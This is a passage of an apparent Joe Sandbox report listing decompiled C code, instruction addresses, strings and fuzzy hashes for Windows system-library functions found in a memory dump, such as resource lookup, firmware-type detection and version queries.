									return _t163;
								}
							}
							L12:
							if(_t256 > 4) {
								goto L57;
							}
							_t167 = _t225 & 0x00000041;
							if(_t167 != 0) {
								__eflags = _t256 - 4;
								if(_t256 != 4) {
									_t163 = 0xc00000f1;
									goto L25;
								}
								L46:
								__eflags = _t167;
								if(_t167 != 0) {
									L15:
									if((_t225 & 0x00000100) == 0) {
										_t169 = _t225 & 0x00000c00;
										__eflags = _t225 & 0x00000200;
										if((_t225 & 0x00000200) == 0) {
											__eflags = _t169 - 0xc00;
											if(_t169 == 0xc00) {
												goto L20;
											}
											L18:
											_t171 = _t225 & 0x00008000;
											 *(_t270 - 0x50) = _t171;
											if(_t171 != 0) {
												_t173 =  !_t225;
												__eflags = _t173 & 0x00000810;
												if((_t173 & 0x00000810) != 0) {
													goto L20;
												}
											}
											if((_t225 & 0x00003000) != 0x3000) {
												__eflags = (_t225 & 0x00000018) - 0x18;
												if((_t225 & 0x00000018) == 0x18) {
													goto L20;
												}
												 *(_t270 - 0x34) = 0;
												__eflags = _t225 & 0x00020000;
												if((_t225 & 0x00020000) != 0) {
													 *((intOrPtr*)(_t270 - 4)) = 0;
													__eflags = _t225 & 0x00000400;
													if((_t225 & 0x00000400) == 0) {
														L70:
														 *(_t270 - 0x30) = 0xc000000d;
														 *((intOrPtr*)(_t270 - 4)) = 0xfffffffe;
														goto L21;
													}
													_t179 =  *(_t270 - 0x44);
													__eflags = _t179;
													if(_t179 == 0) {
														goto L70;
													}
													_t180 =  *_t179;
													__eflags = _t180;
													if(_t180 == 0) {
														goto L70;
													}
													 *(_t270 - 0x34) = _t180;
													_t265 = 0xfffffffe;
													 *((intOrPtr*)(_t270 - 4)) = _t265;
													L29:
													 *((intOrPtr*)(_t270 - 4)) = 1;
													E04CF88C0(_t270 - 0x2c, _t246, _t256 << 2);
													 *((intOrPtr*)(_t270 - 4)) = _t265;
													_t185 = 3;
													__eflags = _t256 - _t185;
													if(__eflags > 0) {
														 *(_t270 + 0x10) = _t185;
														L31:
														_t186 =  *(_t270 - 0x24);
														__eflags = _t186 - 0x10000;
														if(_t186 >= 0x10000) {
															 *((intOrPtr*)(_t270 - 4)) = 2;
															_t257 = 0;
															__eflags =  *_t186;
															if( *_t186 != 0) {
																E04CF5050(0x3000, _t270 - 0x84, _t186);
																_t191 = E04CD56E0(_t270 - 0x84, _t270 - 0x54);
																__eflags = _t191;
																if(_t191 != 0) {
																	L73:
																	 *((intOrPtr*)(_t270 - 4)) = _t265;
																	 *(_t270 - 0x24) =  *(_t270 - 0x54) & 0x0000ffff;
																	L34:
																	_t267 = _t225 & 0x00001000;
																	__eflags = _t225 & 0x00000300;
																	if((_t225 & 0x00000300) == 0) {
																		_t259 = _t225 & 0x00000400;
																		__eflags = _t259;
																		if(_t259 != 0) {
																			L92:
																			__eflags = (_t225 & 0x00001400) - 0x1400;
																			if(__eflags != 0) {
																				__eflags = _t267;
																				_t268 =  *(_t270 - 0x3c);
																				if(_t267 != 0) {
																					_t163 = E04D43C94(_t268);
																					L95:
																					__eflags = _t163;
																					if(_t163 >= 0) {
																						goto L98;
																					}
																					goto L25;
																				}
																				L98:
																				_t196 = E04D4327E(_t268, _t270 - 0x38, _t270 - 0x34, _t225);
																				 *(_t270 - 0x30) = _t196;
																				__eflags = _t196;
																				if(_t196 < 0) {
																					__eflags = _t196 - 0xc000020a;
																					if(_t196 != 0xc000020a) {
																						goto L21;
																					}
																					L38:
																					__eflags =  *(_t270 - 0x50);
																					if( *(_t270 - 0x50) != 0) {
																						_t163 = E04D43C94(_t268);
																						__eflags = _t163;
																						if(__eflags < 0) {
																							goto L25;
																						}
																						_t198 = E04D43608(_t225, _t268, _t225,  *(_t270 + 0x10), _t268, __eflags, _t270 - 0x2c,  *(_t270 + 0x10),  *((intOrPtr*)(_t270 - 0x4c)),  *(_t270 - 0x44),  *((intOrPtr*)(_t270 - 0x48)),  *(_t270 - 0x40));
																						L109:
																						 *(_t270 - 0x30) = _t198;
																						goto L21;
																					}
																					_t269 =  *(_t270 - 0x44);
																					_t261 =  *(_t270 + 0x10);
																					_t200 = E04CBAD00( *(_t270 - 0x38),  *(_t270 - 0x34), _t225, _t270 - 0x2c,  *(_t270 + 0x10),  *((intOrPtr*)(_t270 - 0x4c)),  *(_t270 - 0x44),  *((intOrPtr*)(_t270 - 0x48)),  *(_t270 - 0x40));
																					 *(_t270 - 0x30) = _t200;
																					__eflags = _t200 - 0xc000008a;
																					if(_t200 != 0xc000008a) {
																						goto L21;
																					}
																					__eflags =  *((intOrPtr*)(_t270 - 0x2c)) - 0x18;
																					if( *((intOrPtr*)(_t270 - 0x2c)) == 0x18) {
																						goto L21;
																					}
																					__eflags =  *((intOrPtr*)(_t270 - 0x2c)) - 0x10;
																					if(__eflags == 0) {
																						goto L21;
																					} else {
																						__eflags = E04CBBDE0(_t225, _t261, _t269, __eflags,  *(_t270 - 0x38), 0xf2ee, _t270 - 0x58, 0, 0x1000000);
																						if(__eflags < 0) {
																							goto L21;
																						}
																						 *(_t270 - 0x34) = 0;
																						_push(0);
																						_push(_t225);
																						_push(_t270 - 0x34);
																						_push( *((intOrPtr*)(_t270 - 0x58)));
																						_t206 = E04CBAB70(_t225, _t261, _t269, __eflags);
																						__eflags = _t206;
																						if(_t206 < 0) {
																							goto L21;
																						}
																						__eflags = _t225 | 0x01000000;
																						_t198 = E04CBAD00( *((intOrPtr*)(_t270 - 0x58)),  *(_t270 - 0x34), _t225 | 0x01000000, _t270 - 0x2c, _t261,  *((intOrPtr*)(_t270 - 0x4c)), _t269,  *((intOrPtr*)(_t270 - 0x48)),  *(_t270 - 0x40));
																						goto L109;
																					}
																				}
																				__eflags = _t259;
																				if(__eflags == 0) {
																					__eflags = 0;
																					_push(0);
																					_push(_t268);
																					_push( *(_t270 - 0x34));
																					_push(0);
																				} else {
																					_t259 = 0;
																					_push(0);
																					_push(0);
																					_push( *(_t270 - 0x34));
																					_push(_t268);
																				}
																				_push( *(_t270 - 0x38));
																				_t163 = E04CB8B10(_t225, _t259, _t268, __eflags);
																				__eflags = _t163;
																				if(_t163 >= 0) {
																					goto L38;
																				} else {
																					goto L25;
																				}
																			}
																			_t268 =  *(_t270 - 0x3c);
																			_t163 = E04D43CD4(_t225, _t268, _t259, _t268, __eflags);
																			goto L95;
																		}
																		__eflags = _t225 & 0x00000800;
																		if((_t225 & 0x00000800) == 0) {
																			L37:
																			_t268 =  *(_t270 - 0x3c);
																			goto L38;
																		}
																		_t210 =  !_t225;
																		__eflags = _t210 & 0x00008000;
																		if((_t210 & 0x00008000) == 0) {
																			goto L37;
																		}
																		goto L92;
																	}
																	_t211 =  *(_t270 - 0x3c);
																	 *(_t270 - 0x38) = _t211;
																	__eflags = _t225 & 0x00000200;
																	if(__eflags != 0) {
																		__eflags = _t211 & 0x00000001;
																		if((_t211 & 0x00000001) == 0) {
																			_t213 = _t211 | 0x00000001;
																			__eflags = _t213;
																			 *(_t270 - 0x38) = _t213;
																			_t211 =  *(_t270 - 0x3c);
																		}
																		__eflags = _t267;
																		if(__eflags != 0) {
																			_t163 = E04D43C6A(_t211);
																			__eflags = _t163;
																			if(__eflags < 0) {
																				goto L25;
																			}
																		}
																	}
																	_push(_t257);
																	_push(_t225);
																	_push(_t270 - 0x34);
																	_push( *(_t270 - 0x38));
																	_t163 = E04CBAB70(_t225, _t257, _t267, __eflags);
																	__eflags = _t163;
																	if(_t163 < 0) {
																		__eflags = _t267;
																		if(_t267 != 0) {
																			goto L25;
																		}
																	}
																	goto L37;
																}
																 *((intOrPtr*)(_t270 - 4)) = _t265;
																_t163 = 0xc000000d;
																goto L25;
															}
															 *(_t270 - 0x54) = 0;
															goto L73;
														}
														__eflags = _t186;
														if(_t186 != 0) {
															__eflags = _t186 & 0x000003ff;
															if((_t186 & 0x000003ff) == 0) {
																L81:
																 *(_t270 - 0x30) = 0xc000000d;
																goto L21;
															}
															__eflags = _t186 - 0x7f;
															if(_t186 == 0x7f) {
																goto L81;
															}
															_t257 = 0;
															 *((intOrPtr*)(_t270 - 0x60)) = 0;
															 *(_t270 - 0x5c) = 0;
															_t214 = E04CD5A40(_t246, _t186, _t270 - 0x60, 2, 1);
															__eflags = _t214;
															if(_t214 < 0) {
																goto L81;
															}
															__eflags =  *(_t270 - 0x5c);
															if( *(_t270 - 0x5c) != 0) {
																E04CC3B90(_t270 - 0x60);
															}
															goto L34;
														}
														L33:
														_t257 = 0;
														__eflags = 0;
														goto L34;
													}
													if(__eflags != 0) {
														goto L33;
													}
													goto L31;
												}
												_t265 = 0xfffffffe;
												goto L29;
											}
											goto L20;
										}
										__eflags = _t169;
										L17:
										if(_t290 != 0) {
											goto L20;
										}
										goto L18;
									}
									_t290 = _t225 & 0x00000e00;
									goto L17;
								}
								_t163 = 0xc00000f2;
								goto L25;
							}
							if(_t256 == 4) {
								goto L46;
							}
							goto L15;
						}
					}
				}
				L1:
				_t155 = 0x7ffe0385;
				goto L2;
			}

0x04cba8f0
0x04cba8f2
0x04cba8f7
0x04cba8fc
0x04cba8ff
0x04cba902
0x04cba905
0x04cba90b
0x04cba911
0x04cba914
0x04cba917
0x04cba91d
0x04cba922
0x04cba927
0x04cba928
0x04cba92e
0x04cba92f
0x04cba933
0x04cba93c
0x04cba93d
0x04cba941
0x04cba945
0x04cba952
0x04cba957
0x04d12cd8
0x04d12cdb
0x00000000
0x00000000
0x04d12cea
0x04cba962
0x04cba965
0x04d12cf4
0x04d12cf9
0x04d12cfe
0x04d12d00
0x04d12d12
0x04d12d02
0x04d12d0b
0x04d12d0b
0x04d12d1a
0x04d12d1f
0x04cba96b
0x04cba96b
0x04cba96b
0x04cba972
0x04d12d31
0x04d12d31
0x00000000
0x04cba980
0x04cba982
0x04d12d27
0x04d12d2b
0x00000000
0x00000000
0x00000000
0x04d12d2b
0x04cba988
0x04cba988
0x04cba991
0x04cbab2d
0x04cbab2d
0x04cba99d
0x04cba99f
0x04cba99f
0x04cba9ab
0x04cbaa07
0x04cbaa07
0x00000000
0x04cba9ad
0x04cba9ad
0x04cba9b3
0x04cbab38
0x04cbab3b
0x00000000
0x00000000
0x04d12d3d
0x04d12d3d
0x04cbaa0e
0x04cbaa0e
0x04cbaa13
0x04cbaa13
0x04cbaa1e
0x04cbaa23
0x04d13020
0x04d13023
0x04d13032
0x04d13032
0x04d13023
0x04cbaa2c
0x04d1303d
0x04d13042
0x04d13044
0x04d1304f
0x04d1304f
0x04d1304f
0x04d1305b
0x00000000
0x04cbaa32
0x04cbaa32
0x04cbaa32
0x04cbaa35
0x04cbaa38
0x04cbaa44
0x04cbaa44
0x04cbaa2c
0x04cba9b9
0x04cba9bc
0x00000000
0x00000000
0x04cba9c4
0x04cba9c7
0x04cbab46
0x04cbab49
0x04d12d49
0x00000000
0x04d12d49
0x04cbab4f
0x04cbab4f
0x04cbab51
0x04cba9d6
0x04cba9dc
0x04d12d64
0x04d12d66
0x04d12d6c
0x04d12d75
0x04d12d77
0x00000000
0x00000000
0x04cba9ea
0x04cba9ec
0x04cba9f1
0x04cba9f4
0x04d12d84
0x04d12d86
0x04d12d8b
0x00000000
0x00000000
0x04d12d91
0x04cbaa05
0x04cbaa4c
0x04cbaa4e
0x00000000
0x00000000
0x04cbaa52
0x04cbaa55
0x04cbaa5b
0x04d12d96
0x04d12d99
0x04d12d9f
0x04d12dbc
0x04d12dbc
0x04d12dc3
0x00000000
0x04d12dc3
0x04d12da1
0x04d12da4
0x04d12da6
0x00000000
0x00000000
0x04d12da8
0x04d12daa
0x04d12dac
0x00000000
0x00000000
0x04d12dae
0x04d12db3
0x04d12db4
0x04cbaa64
0x04cbaa64
0x04cbaa76
0x04cbaa7e
0x04cbaa83
0x04cbaa84
0x04cbaa86
0x04cbab5c
0x04cbaa8e
0x04cbaa8e
0x04cbaa91
0x04cbaa96
0x04d12ded
0x04d12df4
0x04d12df6
0x04d12df9
0x04d12e15
0x04d12e25
0x04d12e2a
0x04d12e2c
0x04d12dfe
0x04d12dfe
0x04d12e05
0x04cbaaa6
0x04cbaaa8
0x04cbaaae
0x04cbaab4
0x04d12ecf
0x04d12ecf
0x04d12ed5
0x04d12ef2
0x04d12efb
0x04d12efd
0x04d12f1b
0x04d12f1d
0x04d12f20
0x04d12f0d
0x04d12f12
0x04d12f12
0x04d12f14
0x00000000
0x00000000
0x00000000
0x04d12f16
0x04d12f22
0x04d12f2c
0x04d12f31
0x04d12f34
0x04d12f36
0x04d12f63
0x04d12f68
0x00000000
0x00000000
0x04cbaae5
0x04cbaae5
0x04cbaae9
0x04d12f75
0x04d12f7a
0x04d12f7c
0x00000000
0x00000000
0x04d12f9a
0x04d12fc2
0x04d12fc2
0x00000000
0x04d12fc2
0x04cbaaf5
0x04cbaafc
0x04cbab0b
0x04cbab10
0x04cbab13
0x04cbab18
0x00000000
0x00000000
0x04cbab1e
0x04cbab22
0x00000000
0x00000000
0x04d12fca
0x04d12fce
0x00000000
0x04d12fd4
0x04d12fed
0x04d12fef
0x00000000
0x00000000
0x04d12ff7
0x04d12ffa
0x04d12ffb
0x04d12fff
0x04d13000
0x04d13003
0x04d13008
0x04d1300a
0x00000000
0x00000000
0x04d12fb0
0x04d12fbd
0x00000000
0x04d12fbd
0x04d12fce
0x04d12f38
0x04d12f3a
0x04d12f46
0x04d12f48
0x04d12f49
0x04d12f4a
0x04d12f4d
0x04d12f3c
0x04d12f3c
0x04d12f3e
0x04d12f3f
0x04d12f40
0x04d12f43
0x04d12f43
0x04d12f4e
0x04d12f51
0x04d12f56
0x04d12f58
0x00000000
0x04d12f5e
0x00000000
0x04d12f5e
0x04d12f58
0x04d12eff
0x04d12f04
0x00000000
0x04d12f04
0x04d12ed7
0x04d12edd
0x04cbaae2
0x04cbaae2
0x00000000
0x04cbaae2
0x04d12ee5
0x04d12ee7
0x04d12eec
0x00000000
0x00000000
0x00000000
0x04d12eec
0x04cbaaba
0x04cbaabd
0x04cbaac0
0x04cbaac6
0x04d12e97
0x04d12e99
0x04d12e9b
0x04d12e9b
0x04d12e9e
0x04d12ea1
0x04d12ea1
0x04d12ea4
0x04d12ea6
0x04d12eae
0x04d12eb3
0x04d12eb5
0x00000000
0x00000000
0x04d12ebb
0x04d12ea6
0x04cbaacc
0x04cbaacd
0x04cbaad1
0x04cbaad2
0x04cbaad5
0x04cbaada
0x04cbaadc
0x04d12ec0
0x04d12ec2
0x00000000
0x00000000
0x04d12ec8
0x00000000
0x04cbaadc
0x04d12e2e
0x04d12e31
0x00000000
0x04d12e31
0x04d12dfb
0x00000000
0x04d12dfb
0x04cbaa9c
0x04cbaa9e
0x04d12e4e
0x04d12e53
0x04d12e8b
0x04d12e8b
0x00000000
0x04d12e8b
0x04d12e55
0x04d12e58
0x00000000
0x00000000
0x04d12e5a
0x04d12e5c
0x04d12e5f
0x04d12e6b
0x04d12e70
0x04d12e72
0x00000000
0x00000000
0x04d12e74
0x04d12e77
0x04d12e81
0x04d12e81
0x00000000
0x04d12e77
0x04cbaaa4
0x04cbaaa4
0x04cbaaa4
0x00000000
0x04cbaaa4
0x04cbaa8c
0x00000000
0x00000000
0x00000000
0x04cbaa8c
0x04cbaa63
0x00000000
0x04cbaa63
0x00000000
0x04cbaa05
0x04d12d6e
0x04cba9e8
0x04cba9e8
0x00000000
0x00000000
0x00000000
0x04cba9e8
0x04cba9e2
0x00000000
0x04cba9e2
0x04d12d53
0x00000000
0x04d12d53
0x04cba9d0
0x00000000
0x00000000
0x00000000
0x04cba9d0
0x04cba9ab
0x04cba972
0x04cba95d
0x04cba95d
0x00000000

Strings

LdrResSearchResource Exit, xrefs: 04CBA945
LdrResSearchResource Enter, xrefs: 04CBA933

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 0b1f963da82dea01ed1204899eba9f5a3025a0f5d757149110de950c6c11e28a
Instruction ID: 8ec76300775b69d9fabd154176da0b19194f2f4c0384fc31b2607f90e710eb26
Opcode Fuzzy Hash: 0b1f963da82dea01ed1204899eba9f5a3025a0f5d757149110de950c6c11e28a
Instruction Fuzzy Hash: C1E17371E00255AFEF218E99D980BEEB7BAFF44314F144066EC91E7250E736F9419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D2E372 Relevance: 2.7, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04D2E372(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t64;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t101;
				void* _t106;
				intOrPtr _t108;
				signed int _t109;
				short* _t111;
				signed int _t113;
				intOrPtr _t120;
				signed int* _t122;
				void* _t124;
				signed short* _t126;
				void* _t127;
				void* _t129;

				_push(0x80);
				_push(0x4d8cbc0);
				E04D07C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t127 - 0x80)) = __edx;
				_t122 =  *(_t127 + 0xc);
				 *(_t127 - 0x7c) = _t122;
				 *((char*)(_t127 - 0x65)) = 0;
				 *((intOrPtr*)(_t127 - 0x64)) = 0;
				 *((intOrPtr*)(_t127 - 0x6c)) = 0;
				 *((intOrPtr*)(_t127 - 4)) = 0;
				_t101 = __ecx;
				if(_t101 == 0) {
					 *(_t127 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04CBFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t127 - 0x65)) = 1;
					_t64 =  *(_t127 - 0x90);
					_t102 = _t64[2];
					_t65 =  *_t64 & 0x0000ffff;
					L20:
					_t66 = _t65 >> 1;
					L21:
					_t111 =  *((intOrPtr*)(_t127 - 0x80));
					if(_t111 == 0) {
						L27:
						 *_t122 = _t66 + 1;
						_t68 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t127 - 0x64)) = _t68;
						L29:
						 *((intOrPtr*)(_t127 - 4)) = 0xfffffffe;
						_t69 = E04D2E588(0);
						 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0x10));
						return _t69;
					}
					if(_t66 >=  *((intOrPtr*)(_t127 + 8))) {
						if(_t111 != 0 &&  *((intOrPtr*)(_t127 + 8)) >= 1) {
							 *_t111 = 0;
						}
						goto L27;
					}
					 *_t122 = _t66;
					_t124 = _t66 + _t66;
					E04CF88C0(_t111, _t102, _t124);
					 *((short*)(_t124 +  *((intOrPtr*)(_t127 - 0x80)))) = 0;
					_t68 = 0;
					goto L28;
				}
				_t106 = _t101 - 1;
				if(_t106 == 0) {
					_t126 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04CCAA60(1, _t126, 0x4c81890, _t127 - 0x74);
					 *((intOrPtr*)(_t127 - 0x64)) = _t74;
					_t102 = _t126[2];
					if(_t74 < 0) {
						_t65 =  *_t126 & 0x0000ffff;
						_t122 =  *(_t127 - 0x7c);
						goto L20;
					}
					_t66 = (( *(_t127 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t122 =  *(_t127 - 0x7c);
					goto L21;
				}
				if(_t106 == 1) {
					_t108 = 4;
					 *((intOrPtr*)(_t127 - 0x78)) = _t108;
					 *((intOrPtr*)(_t127 - 0x70)) = 0;
					_push(_t127 - 0x70);
					_push(0);
					_push(0);
					_push(_t108);
					_push(_t127 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t127 - 0x64)) = E04CF3FC0();
					 *((intOrPtr*)(_t127 - 0x64)) = 0;
					_t120 = E04CC5D90(_t108,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t127 - 0x70)));
					 *((intOrPtr*)(_t127 - 0x6c)) = _t120;
					if(_t120 != 0) {
						_push(_t127 - 0x70);
						_push( *((intOrPtr*)(_t127 - 0x70)));
						_push(_t120);
						_push(4);
						_push(_t127 - 0x78);
						_push(0x6b);
						_t84 = E04CF3FC0();
						 *((intOrPtr*)(_t127 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t113 = 0;
						_t109 = 0;
						while(1) {
							 *((intOrPtr*)(_t127 - 0x84)) = _t113;
							 *(_t127 - 0x88) = _t109;
							if(_t109 >= ( *(_t120 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t113 = _t113 + ( *(_t109 * 0x2c + _t120 + 0x21) & 0x000000ff);
							_t109 = _t109 + 1;
						}
						_t88 = E04D2E048(_t109, _t127 - 0x3c, 0x20, _t127 - 0x8c, 0, 0, L"%u", _t113);
						_t129 = _t129 + 0x1c;
						 *((intOrPtr*)(_t127 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t102 = _t127 - 0x3c;
						_t66 =  *((intOrPtr*)(_t127 - 0x8c)) - _t127 - 0x3c >> 1;
						goto L21;
					}
					_t68 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t127 - 0x60);
				_push(0x5a);
				_t94 = E04CF2D10();
				 *((intOrPtr*)(_t127 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t127 - 0x50)) == 1) {
					_t102 = L"Legacy";
					_push(6);
				} else {
					_t102 = L"UEFI";
					_push(4);
				}
				_pop(_t66);
				goto L21;
			}

0x04d2e372
0x04d2e377
0x04d2e37c
0x04d2e381
0x04d2e384
0x04d2e387
0x04d2e38c
0x04d2e38f
0x04d2e394
0x04d2e397
0x04d2e39a
0x04d2e39c
0x04d2e4f6
0x04d2e505
0x04d2e50a
0x04d2e50e
0x04d2e514
0x04d2e517
0x04d2e51d
0x04d2e51d
0x04d2e51f
0x04d2e51f
0x04d2e524
0x04d2e557
0x04d2e558
0x04d2e55a
0x04d2e55f
0x04d2e55f
0x04d2e562
0x04d2e562
0x04d2e569
0x04d2e571
0x04d2e57d
0x04d2e57d
0x04d2e529
0x04d2e54a
0x04d2e554
0x04d2e554
0x00000000
0x04d2e54a
0x04d2e52b
0x04d2e52d
0x04d2e533
0x04d2e540
0x04d2e544
0x00000000
0x04d2e544
0x04d2e3a2
0x04d2e3a5
0x04d2e4b5
0x04d2e4c4
0x04d2e4c9
0x04d2e4cc
0x04d2e4d4
0x04d2e4e2
0x04d2e4e5
0x00000000
0x04d2e4e5
0x04d2e4dc
0x04d2e4dd
0x00000000
0x04d2e4dd
0x04d2e3ae
0x04d2e3e9
0x04d2e3ea
0x04d2e3ed
0x04d2e3f3
0x04d2e3f4
0x04d2e3f5
0x04d2e3f6
0x04d2e3fa
0x04d2e3fb
0x04d2e402
0x04d2e405
0x04d2e41b
0x04d2e41d
0x04d2e422
0x04d2e431
0x04d2e432
0x04d2e435
0x04d2e436
0x04d2e43b
0x04d2e43c
0x04d2e43e
0x04d2e443
0x04d2e448
0x00000000
0x00000000
0x04d2e44e
0x04d2e450
0x04d2e452
0x04d2e452
0x04d2e458
0x04d2e464
0x00000000
0x00000000
0x04d2e46e
0x04d2e470
0x04d2e470
0x04d2e488
0x04d2e48d
0x04d2e490
0x04d2e495
0x00000000
0x00000000
0x04d2e49b
0x04d2e4a8
0x00000000
0x04d2e4a8
0x04d2e424
0x00000000
0x04d2e424
0x04d2e3b0
0x04d2e3b1
0x04d2e3b6
0x04d2e3b7
0x04d2e3b9
0x04d2e3be
0x04d2e3c3
0x00000000
0x00000000
0x04d2e3cf
0x04d2e3da
0x04d2e3df
0x04d2e3d1
0x04d2e3d1
0x04d2e3d6
0x04d2e3d6
0x04d2e3e1
0x00000000

Strings

UEFI, xrefs: 04D2E3D1
Legacy, xrefs: 04D2E3DA

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 5412aef7c9772633e2f9dd72304fa8865ca37e66c5c197380cfddd8ecd3f83c5
Instruction ID: 1d93e724f8b9880e0f04ba752f9e3533d35cd64f28f197b8c49a0d58873c3222
Opcode Fuzzy Hash: 5412aef7c9772633e2f9dd72304fa8865ca37e66c5c197380cfddd8ecd3f83c5
Instruction Fuzzy Hash: 37618D71A106299FEB24DFA8C944BADB7F5FB54708F14402DE549EB251E730F900CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0485 Relevance: 2.6, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E04CB0485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x4da6630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E04CB82E0(0xabababab, 0, "kLsE", 0);
					 *0x4da6630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E04CD5C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E04CB0670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E04CB0670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E04CB0630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E04CF5050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E04CF3EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E04CB0690) {
					 *0x4da91e0();
					_t50 =  *_t73();
				} else {
					_t50 = E04CB0690();
				}
				_t84 = _t50;
				goto L4;
			}

0x04cb048f
0x04cb0493
0x04cb049a
0x04cb04a0
0x04cb04a3
0x04cb04a6
0x04cb04af
0x04cb04b8
0x04cb04c2
0x04cb04cb
0x04cb04ce
0x04cb04d2
0x04cb04d6
0x04cb060e
0x04cb0610
0x04cb0618
0x00000000
0x00000000
0x04cb04ef
0x04cb04ef
0x04cb04f2
0x04cb05e3
0x04cb05ea
0x04cb05f1
0x04cb05f1
0x04cb0501
0x04cb0501
0x04cb0504
0x04cb050c
0x04cb0519
0x04cb051b
0x00000000
0x04d0e99c
0x04d0e9a2
0x04d0e9ac
0x04cb051f
0x04cb052a
0x04d0e9b9
0x04cb05cd
0x04cb05d3
0x04cb05d3
0x04d0e9bf
0x04cb053c
0x04cb054d
0x04cb0559
0x04cb0562
0x04d0e9ce
0x04d0e9ce
0x04cb056a
0x04cb057b
0x04cb0580
0x04cb0580
0x04cb058f
0x04cb0597
0x04cb0598
0x04cb059d
0x04cb05a1
0x04cb05a5
0x04cb05ad
0x04cb05b3
0x04d0e9dd
0x00000000
0x04d0e9ed
0x00000000
0x04d0e9ed
0x04d0e9dd
0x04cb05b9
0x04cb05be
0x04cb05c7
0x04d0e9f2
0x04d0e9f2
0x04cb05c7
0x00000000
0x04cb05ad
0x00000000
0x04d0e9b2
0x04cb050c
0x04cb04fb
0x04d0e989
